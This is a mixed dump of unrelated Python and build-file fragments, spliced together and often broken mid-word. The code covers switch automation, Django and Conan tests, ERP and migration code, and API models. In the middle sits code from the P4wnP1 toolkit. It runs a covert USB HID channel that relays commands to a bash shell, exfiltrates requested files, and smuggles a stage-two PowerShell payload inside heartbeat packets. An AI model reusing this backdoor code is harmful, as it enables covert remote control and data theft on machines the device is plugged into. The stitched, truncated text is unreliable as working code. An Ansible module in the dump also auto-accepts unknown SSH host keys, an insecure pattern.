includes/Theme includes/UiLoader includes/View includes/Version includes/Wallpaper includes/WebContent DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel) if(QT_QTOPENGL_FOUND AND OPENGL_FOUND) install(FILES includes/GLApplet DESTINATION ${INCLUDE_INSTALL_DIR}/KDE/Plasma COMPONENT Devel) endif(QT_QTOPENGL_FOUND AND OPENGL_FOUND) install(FILES servicetypes/plasma-animator.desktop servicetypes/plasma-applet
import os
import re
import cmd
import sys
import time

import util

host = sys.argv[1]

cmd.run("virsh shutdown %s" % (host))
while util.vm_is_running(host):
    time.sleep(1)
#!/usr/bin/python # -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function) __metaclass__ = type # # Copyright (C)
2017 Lenovo, Inc. # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public
License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # # Module to Reset to factory settings of Lenovo Switches # Lenovo Networking # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: cnos_factory author: "Anil Kumar Muraleedharan (@amuraleedhar)" short_description: Reset the switch's startup configuration to default (factory) on devices running Lenovo CNOS description: - This module allows you to reset a switch's startup configuration. The method provides a way to reset the startup configuration to its factory settings. This is helpful when you want to move the switch to another topology as a new network device. This module uses SSH to manage network device configuration. The results of the operation can be viewed in results directory. For more information about this module from Lenovo and customizing it usage for your use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_factory.html) version_added: "2.3" extends_documentation_fragment: cnos options: {} ''' EXAMPLES = ''' Tasks : The following are examples of using the module cnos_reload. These are written in the main.yml file of the tasks directory. --- - name: Test Reset to factory cnos_factory: host: "{{ inventory_hostname }}" username: "{{ hostvars[inventory_hostname]['ansible_ssh_user'] }}" password: "{{ hostvars[inventory_hostname]['ansible_ssh_pass'] }}" deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}" outputfile: "./results/test_factory_{{ inventory_hostname }}_output.txt" ''' RETURN = ''' msg: description: Success or failure message returned: always type: string sample: "Switch Startup Config is Reset to factory settings" ''' import sys try: import paramiko HAS_PARAMIKO = True except ImportError: HAS_PARAMIKO = False import time import socket import array import json import time import re try: from ansible.module_utils.network.cnos import cnos HAS_LIB = True except: HAS_LIB = False from ansible.module_utils.basic import AnsibleModule from collections import defaultdict def main(): module = AnsibleModule( argument_spec=dict( outputfile=dict(required=True), host=dict(required=True), username=dict(required=True), password=dict(required=True, no_log=True), enablePassword=dict(required=False, no_log=True), deviceType=dict(required=True),), supports_check_mode=False) username = module.params['username'] password = module.params['password'] enablePassword = module.params['enablePassword'] cliCommand = "save erase \n" outputfile = module.params['outputfile'] hostIP = module.params['host'] deviceType = module.params['deviceType'] output = "" if not HAS_PARAMIKO: module.fail_json(msg='paramiko is required for this module') # Create instance of SSHClient object remote_conn_pre = paramiko.SSHClient() # Automatically add untrusted hosts (make sure okay for security policy in your environment) remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # initiate SSH connection with the switch remote_conn_pre.connect(hostIP, username=username, password=password) time.sleep(2) # Use invoke_shell to establish an 'interactive session' remote_conn = remote_conn_pre.invoke_shell() time.sleep(2) # Enable and enter configure terminal then send command output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn) output = output + 
cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn) # Make terminal length = 0 output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn) # cnos.debugOutput(cliCommand) # Send the CLi command output = output + cnos.waitForDeviceResponse(cliCommand, "[n]", 2, remote_conn) output = output + cnos.waitForDeviceResponse("y" + "\n", "#", 2, remote_conn) # Save it into the file file = open(outputfile, "a") file.write(output) file.close() errorMsg = cnos.checkOutputForError(output) if(errorMsg is None): module.exit_json(changed=True, msg="Switch Startup Config is Reset to factory settings ") else: module.fail_json(msg=errorMsg) if __name__ == '__main__': main()
import os import unittest from conans.client.cache.cache import CONAN_CONF from conans.client.conf import ConanClientConfigParser from conans.paths import DEFAULT_PROFILE_NAME from conans.test.utils.test_files import temp_folder from conans.util.files import save default_client_conf = '''[storage] path: ~/.conan/data [log] trace_file = "Path/with/quotes" [general] ''' default_profile = ''' [settings] arch=x86_64 build_type=Release compiler=gcc compiler.libcxx=libstdc++ compiler.version=4.9 os=Linux ''' class ClientConfTest(unittest.TestCase): def test_quotes(self): tmp_dir = temp_folder() save(os.path.join(tmp_dir, CONAN_CONF), default_client_conf) save(os.path.join(tmp_dir, DEFAULT_PROFILE_NAME), default_profile) config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertEqual(config.env_vars["CONAN_TRACE_FILE"], "Path/with/quotes") def test_proxies(self): tmp_dir = temp_folder() save(os.path.join(tmp_dir, CONAN_CONF), "") config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertEq
ual(None, config.proxies) save(os.path.
join(tmp_dir, CONAN_CONF), "[proxies]") config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertNotIn("no_proxy", config.proxies) save(os.path.join(tmp_dir, CONAN_CONF), "[proxies]\nno_proxy=localhost") config = ConanClientConfigParser(os.path.join(tmp_dir, CONAN_CONF)) self.assertEqual(config.proxies["no_proxy"], "localhost")
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe from frappe.utils import cstr, filter_strip_join from frappe.website.website_generator import WebsiteGenerator from frappe.contacts.address_and_contact import load_address_and_contact class SalesPartner(WebsiteGenerator): website = frappe._dict( page_title_field = "partner_name", condition_field = "show_in_website", template = "templates/generators/sales_partner.html" ) def onload(self): """Load address and contacts in `__onload`""" load_address_and_contact(self, "sales_partner") def autoname(self): self.name = self.partner_name def validate(self): if not self.route: self.route = "partners/" + self.scrub(self.part
ner_name) super(SalesPartner, self).validate() if self.partner_website and not self.partner_website.startswith("http"): self.partner_website = "http://" + self.partner_website def get_context(self, context): address = frappe.db.get_value("Address", {"sales_partner": self.name, "is_primary_address": 1}, "*", as_dict=True) if address: city_state = ", ".join(filter(None, [address.city, address.state])) address_rows = [address.address_line1, address.address_line2, ci
ty_state, address.pincode, address.country] context.update({ "email": address.email_id, "partner_address": filter_strip_join(address_rows, "\n<br>"), "phone": filter_strip_join(cstr(address.phone).split(","), "\n<br>") }) return context
gment_assembler del fragment_assembler[stream_id] else: # append data to stream fragment_assembler[stream_id][2] += data #print repr(fragment_assembler[stream_id][2]) else: # start stream, if not existing data_arr = [src, dst, data] fragment_assembler[stream_id] = data_arr def send_datastream(qout, src=1, dst=1, data=""): # split data into chunks fitting into packet payload (60 bytes) chnks = chunks(data) for chunk in chnks: data_arr = [src, dst, chunk] qout.put(data_arr) # append empty packet to close stream qout.put([src, dst, ""]) def send_packet(f, src=1, dst=1, data="", rcv=0): snd = len(data) #print "Send size: " + str(snd) packet = struct.pack('!BBBB60s', src, dst, snd, rcv, data) #print packet.encode("hex") f.write(packet) def read_packet(f): hidin = f.read(0x40) #print "Input received (" + str(len(hidin)) + " bytes):" #print hidin.encode("hex") data = struct.unpack('!BBBB60s', hidin) src = data[0] dst = data[1] snd = data[2] rcv = data[3] # reduce msg to real size msg = data[4][0:snd] return [src, dst, snd, rcv, msg] def process_input(qin, subproc): # HID in loop, should ho to thread # check if input queue contains data while True: if not qin.empty(): input = qin.get() src=input[0] dst=input[1] stream=input[2] # process received input # stdin (redirect to bash) if dst == 1: command=stream if command.upper() == "RESET_BASH": # send sigint to bash print "Restarting bash process" reset_bash(subproc) else: print "running command '" + command + "'" run_local_command(command, subproc) # stdout elif dst == 2: print "Data received on stdout" print stream pass # stderr elif dst == 3: pass # getfile elif dst == 4: print "Data receiveced on dst=4 (getfile): " + stream args=stream.split(" ",3) if (len(args) < 3): # too few arguments, echo this back with src=2, dst=3 (stderr) print "To few arguments" send_datastream(qout, 4, 3, "P4wnP1 received 'getfile' with too few arguments") # ToDo: files are reassembled here, this code should be moved into a separate method else: # check if first word is "getfile" ignore otherwise if not args[0].strip().lower() == "getfile": send_datastream(qout, 4, 3, "P4wnP1 received data on dst=4 (getfile) but wrong request format was choosen") continue filename = args[1].strip() varname = args[2].strip() content = None # try to open file, send error if not possible try: with open(filename, "rb") as f: content = f.read() # naive approach, reading whole file at once (we split into chunks anyway) except IOError as e: # deliver Error to Client errorstream send_datastream(qout, 4, 3, "Error on getfile: " + e.strerror) continue # send header print "Varname " + str(varname) send_datastr
eam(qout, 4, 4, "BEGINFILE " + filename + " " + varname) # send filecontent (sould be chunked into multiple streams, but would need reassembling on layer5) # note: The client has to read (and recognize) ASCII based header and footer streams, but content could be in binary form
if content == None: send_datastream(qout, 4, 3, "Error on getfile: No file content read") else: #send_datastream(qout, 4, 4, content) streamchunksize=600 for chunk in chunks(content, streamchunksize): send_datastream(qout, 4, 4, chunk) # send footer send_datastream(qout, 4, 4, "ENDFILE " + filename + " " + varname) else: print "Input in input queue:" print input def run_local_command(command, bash): bash = subproc[0] sin = bash.stdin sin.write(command + "\n") sin.flush() return def process_bash_output(qout, subproc): buf = "" while True: bash = subproc[0] outstream = bash.stdout #print "Reading stdout of bash on " + str(outstream) # check for output which needs to be delivered from backing bash try: r,w,ex = select([outstream], [], [], 0.1) except ValueError: # we should land here if the output stream is closed # because a new bash process was started pass if outstream in r: byte = outstream.read(1) if byte == "\n": # full line received from subprocess, send it to HID # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client # we set src=1 as we receive bash commands on dst=1 # dst = 2 (stdout of client) send_datastream(qout, 2, 2, buf) # clear buffer buf = "" else: buf += byte def process_bash_error(qout, subproc): buf = "" while True: bash = subproc[0] errstream = bash.stderr # check for output which needs to be delivered from backing bash stderr try: r,w,ex = select([errstream], [], [], 0.1) except ValueError: # we should land here if the error stream is closed # because a new bash process was started pass if errstream in r: byte = errstream.read(1) if byte == "\n": # full line received from subprocess, send it to HID # note: the newline char isn't send, as each outputstream is printed in a separate line by the powershell client # dst = 3 (stderr of client) send_datastream(qout, 3, 3, buf) # clear buffer buf = "" else: buf += byte # As we don't pipe CTRL+C intterupt from client through # HID data stream, there has to be another option to reset the bash process if it stalls # This could easily happen, as we don't support interactive commands, waiting for input # (this non-interactive shell restriction should be a known hurdle to every pentester out there) def reset_bash(subproc): bash = subproc[0] bash.stdout.close() bash.kill() send_datastream(qout, 3, 3, "Bash process terminated") bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) subproc[0] = bash if bash.poll() == None: send_datastream(qout, 3, 3, "New bash process started") else: send_datastream(qout, 3, 3, "Restarting bash failed") # prepare a stream to answer a getfile request def stream_from_getfile(filename): with open(filename,"rb") as f: content = f.read() return content # main code qout = Queue.Queue() qin = Queue.Queue() fragment_assembler = {} bash = subprocess.Popen(["bash"], stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE) subproc = [bash] # packed into array to allow easy "call by ref" # process input thread.start_new_thread(process_input, (qin, subproc)) # process output thread.start_new_thread(process_bash_output, (qout, subproc)) # process error thread.start_new_thread(process_bash_error, (qout, subproc)) # Initialize stage one payload, carried with heartbeat package in endless loop with open("stage2.ps1","rb") as f: stage2=f.read() #initial_payload="#Hey this is the test data for an initial payload calling get-date on PS\nGet-Date" stage2_chunks = chunks(stage2) heartbeat_content = [] 
heartbeat_content += ["begin_heartbeat"] heartbeat_content += stage2_chunks heartbeat_content += ["end_heartbeat"] heartbeat_counter = 0 with open("/dev/hidg1","r+b") as f: # send test data stream send_datastream(qout, 1, 1, "Hello from P4wnP1, this message has been sent through a HID device") while True: packet = read_packet(f) src = packet[0] dst = packet[1] snd = packet[2] rcv = packet[3] msg = packet[4] # put packet to input queue fragment_rcvd(qin, fragment_assembler, src, dst, msg) #print "Packet received" #print "SRC: " + str(src) + " DST: " + str(dst) + " SND: " + str(snd) + " RCV: " + str(rcv) #print "Payload: " + repr(msg) # send data from output queue (empty packet otherwise) if qout.empty(): # empty keep alive (rcv field filled) #send_packet(f=f, src=0, dst=0, data="", rcv=snd) # as the content "keep alive" packets (src=0, dst=0) is ignored # by the PowerShell client, we use them to carry the initial payload # in an endless loop if heartbeat_counter == len(heartbeat_content): heartbeat_counter = 0 send_packet(f=f, src=
bundle_5 = Bundle(data={'time': None}) field_5 = TimeField(attribute='created', null=True) field_5.instance_name = 'time' self.assertEqual(field_5.hydrate(bundle_5), None) class DateFieldTestCase(TestCase): fixtures = ['note_testdata.json'] def test_init(self): field_1 = CharField() self.assertEqual(field_1.help_text, 'Unicode string data. Ex: "Hello World"') field_2 = CharField(help_text="Custom.") self.assertEqual(field_2.help_text, 'Custom.') def test_dehydrated_type(self): field_1 = DateField() self.assertEqual(field_1.dehydrated_type, 'date') def test_dehydrate(self): note = Note.objects.get(pk=1) bundle = Bundle(obj=note) field_1 = DateField(attribute='created') self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5)) field_2 = DateField(default=datetime.date(2010, 4, 1)) self.assertEqual(field_2.dehydrate(bundle), datetime.date(2010, 4, 1)) note.created_string = '2010-04-02' field_3 = DateField(attribute='created_string') self.assertEqual(field_3.dehydrate(bundle), datetime.date(2010, 4, 2)) def test_hydrate(self): bundle_1 = Bundle(data={ 'date': '2010-05-12', }) field_1 = DateField(attribute='created') field_1.instance_name = 'date' self.assertEqual(field_1.hydrate(bundle_1), datetime.date(2010, 5, 12)) bundle_2 = Bundle() field_2 = DateField(default=datetime.date(2010, 4, 1)) field_2.instance_name = 'date' self.assertEqual(field_2.hydrate(bundle_2), datetime.date(2010, 4, 1)) bundle_3 = Bundle(data={ 'date': 'Wednesday, May 12, 2010', }) field_3 = DateField(attribute='created_string') field_3.instance_name = 'date' self.assertEqual(field_3.hydrate(bundle_3), datetime.date(2010, 5, 12)) bundle_4 = Bundle(data={ 'date': '5 Apr 2010', }) field_4 = DateField(attribute='created') field_4.instance_name = 'date' self.assertEqual(field_4.hydrate(bundle_4), datetime.date(2010, 4, 5)) bundle_5 = Bundle(data={ 'date': None, }) field_5 = DateField(attribute='created', null=True) field_5.instance_name = 'date' self.assertEqual(field_5.hydrate(bundle_5), None) def test_model_resource_correct_association(self): api_field = ModelResource.api_field_from_django_field(models.DateField()) self.assertEqual(api_field, DateField) class DateTimeFieldTestCase(TestCase): fixtures = ['note_testdata.json'] def test_init(self): field_1 = CharField() self.assertEqual(field_1.help_text, 'Unicode string data. 
Ex: "Hello World"') field_2 = CharField(help_text="Custom.") self.assertEqual(field_2.help_text, 'Custom.') def test_dehydrated_type(self): field_1 = DateTimeField() self.assertEqual(field_1.dehydrated_type, 'datetime') def test_dehydrate(self): note = Note.objects.get(pk=1) bundle = Bundle(obj=note) field_1 = DateTimeField(attribute='created') self.assertEqual(field_1.dehydrate(bundle), aware_datetime(2010, 3, 30, 20, 5)) field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 1, 7)) self.assertEqual(field_2.dehydrate(bundle), aware_datetime(2010, 4, 1, 1, 7)) note.created_string = '2010-04-02 01:11:00' field_3 = DateTimeField(attribute='created_string') self.assertEqual(field_3.dehydrate(bundle), aware_datetime(2010, 4, 2, 1, 11)) def test_hydrate(self): bundle_1 = Bundle(data={ 'datetime': '2010-05-12 10:36:28', }) field_1 = DateTimeField(attribute='created') field_1.instance_name = 'datetime' self.assertEqual(field_1.hydrate(bundle_1), aware_datetime(2010, 5, 12, 10, 36, 28)) bundle_2 = Bundle() field_2 = DateTimeField(default=aware_datetime(2010, 4, 1, 2, 0)) field_2.instance_name = 'datetime' self.assertEqual(field_2.hydrate(bundle_2), aware_datetime(2010, 4, 1, 2, 0)) bundle_3 = Bundle(data={ 'datetime': 'Tue, 30 Mar 2010 20:05:00 -0500', }) field_3 = DateTimeField(attribute='created_string') field_3.instance_name = 'datetime' self.assertEqual(field_3.hydrate(bundle_3), aware_datetime(2010, 3, 30, 20, 5, tzinfo=tzoffset(None, -18000))) bundle_4 = Bundle(data={ 'datetime': None, }) field_4 = DateField(attribute='created', null=True) field_4.instance_name = 'datetime' self.assertEqual(field_4.hydrate(bundle_4), None) bundle_5 = Bundle(data={'datetime': 'foo'}) field_5 = DateTimeField() field_5.instance_name = 'datetime' self.assertRaises(ApiFieldError, field_5.hydrate, bundle_5) bundle_6 = Bundle(data={'datetime': ['a', 'list', 'used', 'to', 'crash']}) field_6 = DateTimeField() field_6.instance_name = 'datetime' self.assertRaises(ApiFieldError, field_6.hydrate, bundle_6) def test_model_resource_correct_association(self): api_field = ModelResource.api_field_from_django_field(models.DateTimeField()) self.assertEqual(api_field, DateTimeField) class UserResource(ModelResource): class Meta: resource_name = 'users' queryset = User.objects.all() def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'): if bundle_or_obj is None: return '/api/v1/users/' return '/api/v1/users/%s/' % bundle_or_obj.obj.id class ToOneFieldTestCase(TestCase): fixtures = ['note_testdata.json'] def test_init(self): field_1 = ToOneField(UserResource, 'author') self.assertEqual(field_1.instance_name, None) self.assertEqual(issubclass(field_1.to, UserResource), True) self.assertEqual(field_1.attribute, 'author') self.assertEqual(field_1.related_name, None) self.assertEqual(field_1.null, False) self.assertEq
ual(field_1.full, False) self.assertEqual(field_1.readonly, False) self.assertEqual(field_1.help_text, 'A single related resource. Can
be either a URI or set of nested resource data.') field_2 = ToOneField(UserResource, 'author', null=True, help_text="Points to a User.") self.assertEqual(field_2.instance_name, None) self.assertEqual(issubclass(field_2.to, UserResource), True) self.assertEqual(field_2.attribute, 'author') self.assertEqual(field_2.related_name, None) self.assertEqual(field_2.null, True) self.assertEqual(field_2.full, False) self.assertEqual(field_2.readonly, False) self.assertEqual(field_2.help_text, 'Points to a User.') field_3 = ToOneField(UserResource, 'author', default=1, null=True, help_text="Points to a User.") self.assertEqual(field_3.instance_name, None) self.assertEqual(issubclass(field_3.to, UserResource), True) self.assertEqual(field_3.attribute, 'author') self.assertEqual(field_3.related_name, None) self.assertEqual(field_3.null, True) self.assertEqual(field_3.default, 1) self.assertEqual(field_3.full, False) self.assertEqual(field_3.readonly, False) self.assertEqual(field_3.help_text, 'Points to a User.') field_4 = ToOneField(UserResource, 'author', default=1, null=True, readonly=True, help_text="Points to a User.") self.assertEqual(field_4.instance_name, None) self.assertEqual(issubclass(field_4.to, UserResource), True) self.assertEqual(field_4.attribute, 'author') self.assertEqual(field_4.related_name, None) self.assertEqual(field_4.null, True) self.assertEqual(field_4.default, 1) self.assertEqual(field_4.full, False) self.assertEqual(field_4.readonly, True) self.assertEqual(field_4.help_text, 'Points to a User.') field_5 = ToOneField(UserResource, 'author', defa
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import DataMigration from django.db import models from django.contrib.gis.geos import geometry from PIL import Image from PIL.ExifTags import TAGS from ..util import point_from_exif class Migration(DataMigration): def forwards(self, orm): for photo in orm['photomap.Photo'].objects.all(): photo.location = point_from_exif(photo.image.path) photo.save() def backwards(self, orm): raise NotImplementedError('Too lazy to write a method to write the' ' coordinates to the EXIF of the files') models
= { u'photomap.photo': { 'Meta': {'object_name': 'Photo'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100
'}), 'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True'}) } } complete_apps = ['photomap'] symmetrical = True
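# NOTE: the forwards() migration above calls point_from_exif() from ..util,
# which is not included here. A minimal, hypothetical sketch of such a helper
# is given below, assuming standard GPS EXIF tags stored as rational
# (numerator, denominator) pairs and a GeoDjango Point; the project's real
# helper may differ.
from PIL import Image as PILImage
from PIL.ExifTags import TAGS as EXIF_TAGS, GPSTAGS
from django.contrib.gis.geos import Point


def _dms_to_degrees(dms, ref):
    # dms is ((deg_num, deg_den), (min_num, min_den), (sec_num, sec_den))
    deg = dms[0][0] / float(dms[0][1])
    minutes = dms[1][0] / float(dms[1][1])
    seconds = dms[2][0] / float(dms[2][1])
    value = deg + minutes / 60.0 + seconds / 3600.0
    return -value if ref in ('S', 'W') else value


def point_from_exif_sketch(image_path):
    exif = PILImage.open(image_path)._getexif() or {}
    named = dict((EXIF_TAGS.get(tag, tag), value) for tag, value in exif.items())
    gps_raw = named.get('GPSInfo')
    if not gps_raw:
        return None
    gps = dict((GPSTAGS.get(tag, tag), value) for tag, value in gps_raw.items())
    lat = _dms_to_degrees(gps['GPSLatitude'], gps['GPSLatitudeRef'])
    lon = _dms_to_degrees(gps['GPSLongitude'], gps['GPSLongitudeRef'])
    return Point(lon, lat)  # GEOS points take (x=longitude, y=latitude)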
#Licensed to the Apache Software Foundation (ASF) under one #or more contributor license agreements. See the NOTICE file #distributed with this work for additional information #regarding copyright ownership. The ASF licenses this file #to you under the Apache License, Version 2.0 (the #"License"); you may not use this file except in compliance #with the License. You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing
permissions and #limitations under the License. """Gold Allocation Manager Implementation""" # -*- python -*- import sys, httplib import sha, base64, hmac import xml.dom.minidom from hodlib.Common.util import * class goldAllocationManager: def __init__(self, cfg, log): self.__GOLD_SEC
RET_KEY_FILE = cfg['auth-file'] (self.__goldHost, self.__goldPort) = (cfg['allocation-manager-address'][0], cfg['allocation-manager-address'][1]) self.cfg = cfg self.log = log def getQuote(self, user, project, ignoreErrors=True): # Get Secret Key from File secret = '' try: secretFile = open(self.__GOLD_SECRET_KEY_FILE) secret = secretFile.readline() except Exception, e: self.log.error("Unable to open file %s" % self.__GOLD_SECRET_KEY_FILE) self.log.debug(get_exception_string()) return (ignoreErrors or False) secretFile.close() secret = secret.rstrip() # construct the SSRMAP request body body = '<Body><Request action="Quote" actor="hod"><Object>Job</Object><Data><Job><ProjectId>%s</ProjectId><UserId>%s</UserId><WallDuration>10</WallDuration></Job></Data></Request></Body>' % (project, user) # compute digest message = sha.new() message.update(body) digest = message.digest() digestStr = base64.b64encode(digest) # compute signature message = hmac.new(secret, digest, sha) signatureStr = base64.b64encode(message.digest()) # construct the SSSRMAP Message sssrmapRequest = '<?xml version="1.0" encoding="UTF-8"?>\ <Envelope>%s<Signature><DigestValue>%s</DigestValue><SignatureValue>%s</SignatureValue><SecurityToken type="Symmetric"></SecurityToken></Signature></Envelope>' % (body, digestStr, signatureStr) self.log.info('sssrmapRequest: %s' % sssrmapRequest) try: # post message to GOLD server webservice = httplib.HTTP(self.__goldHost, self.__goldPort) webservice.putrequest("POST", "/SSSRMAP3 HTTP/1.1") webservice.putheader("Content-Type", "text/xml; charset=\"utf-8\"") webservice.putheader("Transfer-Encoding", "chunked") webservice.endheaders() webservice.send("%X" % len(sssrmapRequest) + "\r\n" + sssrmapRequest + '0\r\n') # handle the response statusCode, statusmessage, header = webservice.getreply() responseStr = webservice.getfile().read() self.log.debug("httpStatusCode: %d" % statusCode) self.log.info('responseStr: %s' % responseStr) # parse XML response if (statusCode == 200): responseArr = responseStr.split("\n") responseBody = responseArr[2] try: doc = xml.dom.minidom.parseString(responseBody) responseVal = doc.getElementsByTagName("Value")[0].firstChild.nodeValue self.log.info("responseVal: %s" % responseVal) if (responseVal == 'Success'): return True else: return False except Exception, e: self.log.error("Unable to parse GOLD responseBody XML \"(%s)\" to get responseVal" % (responseBody)) self.log.debug(get_exception_string()) return (ignoreErrors or False) else: self.log.error("Invalid HTTP statusCode %d" % statusCode) except Exception, e: self.log.error("Unable to POST message to GOLD server (%s, %d)" % (self.__goldHost, self.__goldPort)) self.log.debug(get_exception_string()) return (ignoreErrors or False) return True
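# getQuote() above builds the SSSRMAP digest and signature with the Python 2
# `sha` module, which has long been removed from the standard library. A
# minimal sketch of the same digest/HMAC computation on Python 3 using
# hashlib/hmac; the body and secret below are placeholders, not real values.
import base64
import hashlib
import hmac


def sign_sssrmap_body(body, secret):
    """Return (digest_b64, signature_b64) for an SSSRMAP request body."""
    digest = hashlib.sha1(body).digest()
    digest_b64 = base64.b64encode(digest).decode('ascii')
    signature = hmac.new(secret, digest, hashlib.sha1).digest()
    signature_b64 = base64.b64encode(signature).decode('ascii')
    return digest_b64, signature_b64


# Usage sketch (placeholder values):
# digest_str, signature_str = sign_sssrmap_body(b'<Body>...</Body>', b'secret-key')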
"""Tests for two-process terminal frontend Currently only has the most simple test possible, starting a console and running a single command. Authors: * Min RK """ #----------------------------------------------------------------------------- # Imports #---------------------------------------
-------------------------------------- import sys import time import nose.tools as nt from nose import SkipTest import IPython.testing.tools as tt from IPython.testing import decorators as dec from IPython.utils import py3compat #--
--------------------------------------------------------------------------- # Tests #----------------------------------------------------------------------------- @dec.skip_win32 def test_console_starts(): """test that `ipython console` starts a terminal""" from IPython.external import pexpect args = ['console', '--colors=NoColor'] # FIXME: remove workaround for 2.6 support if sys.version_info[:2] > (2,6): args = ['-m', 'IPython'] + args cmd = sys.executable else: cmd = 'ipython' try: p = pexpect.spawn(cmd, args=args) except IOError: raise SkipTest("Couldn't find command %s" % cmd) # timeout after one minute t = 60 idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t) p.sendline('5') idx = p.expect([r'Out\[\d+\]: 5', pexpect.EOF], timeout=t) idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t) # send ctrl-D;ctrl-D to exit p.sendeof() p.sendeof() p.expect([pexpect.EOF, pexpect.TIMEOUT], timeout=t) if p.isalive(): p.terminate() def test_help_output(): """ipython console --help-all works""" tt.help_all_output_test('console')
# coding: utf-8 """ ORCID Member No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: Latest Generated by: https://github.com/swagger-api/swagger-codegen.git """ import pprint import re # noqa: F401 import six from orcid_api_v3.models.subtitle_v30_rc2 import SubtitleV30Rc2 # noqa: F401,E501 from orcid_api_v3.models.title_v30_rc2 import TitleV30Rc2 # noqa: F401,E501 from orcid_api_v3.models.translated_title_v30_rc2 import TranslatedTitleV30Rc2 # noqa: F401,E501 class WorkTitleV30Rc2(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ """ Attributes: swagger_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ swagger_types = { 'title': 'TitleV30Rc2', 'subtitle': 'SubtitleV30Rc2', 'translated_title': 'TranslatedTitleV30Rc2' } attribute_map = { 'title': 'title', 'subtitle': 'subtitle', 'translated_title': 'translated-title' } def __init__(self, title=None, subtitle=None, translated_title=None): # noqa: E501 """WorkTitleV30Rc2 - a model defined in Swagger""" # noqa: E501 self._title = None self._subtitle = None self._translated_title = None self.discriminator = None if title is not None: self.title = title if subtitle is not None: self.subtitle = subtitle if translated_title is not None: self.translated_title = translated_title @property def title(self): """Gets the title of this WorkTitleV30Rc2. # noqa: E501 :return: The title of this WorkTitleV30Rc2. # noqa: E501 :rtype: TitleV30Rc2 """ return self._title @title.setter def title(self, title): """Sets the title of this WorkTitleV30Rc2. :param title: The title of this WorkTitleV30Rc2. # noqa: E501 :type: TitleV30Rc2 """ self._title = title @property def subtitle(self): """Gets the subtitle of this WorkTitleV30Rc2. # noqa: E501 :return: The subtitle of this WorkTitleV30Rc2. # noqa: E501 :rtype: SubtitleV30Rc2 """ return self._subtitle @subtitle.setter def subtitle(self, subtitle): """Sets the subtitle of this WorkTitleV30Rc2. :param subtitle: The subtitle of this WorkTitleV30Rc2. # noqa: E501 :type: SubtitleV30Rc2 """ self._subtitle = subtitle @property def translated_title(self): """Gets the translated_title of this WorkTitleV30Rc2. # noqa: E501 :return: The translated_title of this WorkTitleV30Rc2. # noqa: E501 :rtype: TranslatedTitleV30Rc2 """ return self._translated_title @translated_title.setter def translated_title(self, translated_title): """Sets the translated_title of this WorkTitleV30Rc2. :param translated_title: The translated_title of this WorkTitleV30Rc2. # noqa: E501 :type: TranslatedTitleV30Rc2 """ self._translated_title = translated_title def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.swagger_types): value = get
attr(self, attr) if isinstance(value, list): result[attr] = list(map
( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: result[attr] = value if issubclass(WorkTitleV30Rc2, dict): for key, value in self.items(): result[key] = value return result def to_str(self): """Returns the string representation of the model""" return pprint.pformat(self.to_dict()) def __repr__(self): """For `print` and `pprint`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, WorkTitleV30Rc2): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
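# A small usage sketch of the generated model above: with no nested title
# objects supplied, to_dict() simply echoes the attributes back as None, and
# __eq__ compares the instances' __dict__.
if __name__ == "__main__":
    work_title = WorkTitleV30Rc2()
    print(work_title.to_dict())
    # {'title': None, 'subtitle': None, 'translated_title': None}
    print(work_title == WorkTitleV30Rc2())  # True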
